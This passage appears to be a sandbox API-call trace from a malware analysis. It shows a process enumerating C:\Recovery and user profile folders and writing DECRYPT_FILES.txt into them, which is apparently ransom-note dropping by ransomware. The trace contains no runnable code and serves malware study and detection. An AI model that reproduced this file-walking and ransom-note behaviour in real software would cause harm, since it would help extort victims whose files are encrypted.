cAlternateFileName="")) returned 0x1a5ddfd0 [0052.007] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.007] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0052.007] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0052.007] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.007] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e3d0) returned 1 [0052.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e390) returned 1 [0052.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5e480) returned 1 [0052.008] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", nBufferLength=0x105, lpBuffer=0x1bf5df70, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpFilePart=0x0) returned 0x30 [0052.008] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", nBufferLength=0x105, lpBuffer=0x1bf5df10, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpFilePart=0x0) returned 0x31 [0052.008] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x1bf5e120 | out: lpFindFileData=0x1bf5e120*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.008] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.008] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0052.008] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0052.009] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0052.009] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e3d0) returned 1 [0052.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e390) returned 1 [0052.009] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5df10, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x42 [0052.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5e3f0) returned 1 [0052.009] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\DECRYPT_FILES.txt" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d8 [0052.027] GetFileType (hFile=0x3d8) returned 0x1 [0052.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e360) returned 1 [0052.028] GetFileType (hFile=0x3d8) returned 0x1 [0052.038] WriteFile (in: hFile=0x3d8, lpBuffer=0x213b5e0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5e438, lpOverlapped=0x0 | out: lpBuffer=0x213b5e0*, lpNumberOfBytesWritten=0x1bf5e438*=0x9d5, lpOverlapped=0x0) returned 1 [0052.334] CloseHandle (hObject=0x3d8) returned 1 [0052.335] GetFullPathNameW (in: lpFileName="C:\\Recovery\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5e810, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1d [0052.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5ecf0) returned 1 [0052.335] CreateFileW (lpFileName="C:\\Recovery\\DECRYPT_FILES.txt" (normalized: "c:\\recovery\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d8 [0052.335] GetFileType (hFile=0x3d8) returned 0x1 [0052.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ec60) returned 1 [0052.335] GetFileType (hFile=0x3d8) returned 0x1 [0052.335] WriteFile (in: hFile=0x3d8, lpBuffer=0x213dcb8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5ed38, lpOverlapped=0x0 | out: lpBuffer=0x213dcb8*, lpNumberOfBytesWritten=0x1bf5ed38*=0x9d5, lpOverlapped=0x0) returned 1 [0052.336] CloseHandle (hObject=0x3d8) returned 1 [0052.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5ed80) returned 1 [0052.337] GetFullPathNameW (in: lpFileName="C:\\System Volume Information", nBufferLength=0x105, lpBuffer=0x1bf5e870, lpFilePart=0x0 | out: lpBuffer="C:\\System Volume Information", lpFilePart=0x0) returned 0x1c [0052.337] GetFullPathNameW (in: lpFileName="C:\\System Volume Information\\", nBufferLength=0x105, lpBuffer=0x1bf5e810, lpFilePart=0x0 | out: lpBuffer="C:\\System Volume Information\\", lpFilePart=0x0) returned 0x1d [0052.337] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*", lpFindFileData=0x1bf5ea20 | out: lpFindFileData=0x1bf5ea20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0052.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ecb0) returned 1 [0052.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5ed80) returned 1 [0052.340] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1bf5e870, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0052.340] GetFullPathNameW (in: lpFileName="C:\\Users\\", nBufferLength=0x105, lpBuffer=0x1bf5e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\", lpFilePart=0x0) returned 0x9 [0052.340] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x1bf5ea20 | out: lpFindFileData=0x1bf5ea20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.340] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.340] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0052.341] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0052.341] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0052.341] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0052.341] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0052.341] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0052.341] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0052.341] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ecd0) returned 1 [0052.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ec90) returned 1 [0052.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5ed80) returned 1 [0052.342] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1bf5e870, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0052.342] GetFullPathNameW (in: lpFileName="C:\\Users\\", nBufferLength=0x105, lpBuffer=0x1bf5e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\", lpFilePart=0x0) returned 0x9 [0052.342] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x1bf5ea20 | out: lpFindFileData=0x1bf5ea20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.342] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.342] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0052.342] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0052.342] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0052.342] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0052.343] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0052.343] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0052.343] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.343] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ecd0) returned 1 [0052.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ec90) returned 1 [0052.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5e480) returned 1 [0052.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1bf5df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0052.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", nBufferLength=0x105, lpBuffer=0x1bf5df10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpFilePart=0x0) returned 0x1e [0052.344] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x1bf5e120 | out: lpFindFileData=0x1bf5e120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.344] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.344] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0052.344] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0052.344] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0052.344] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0052.345] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, 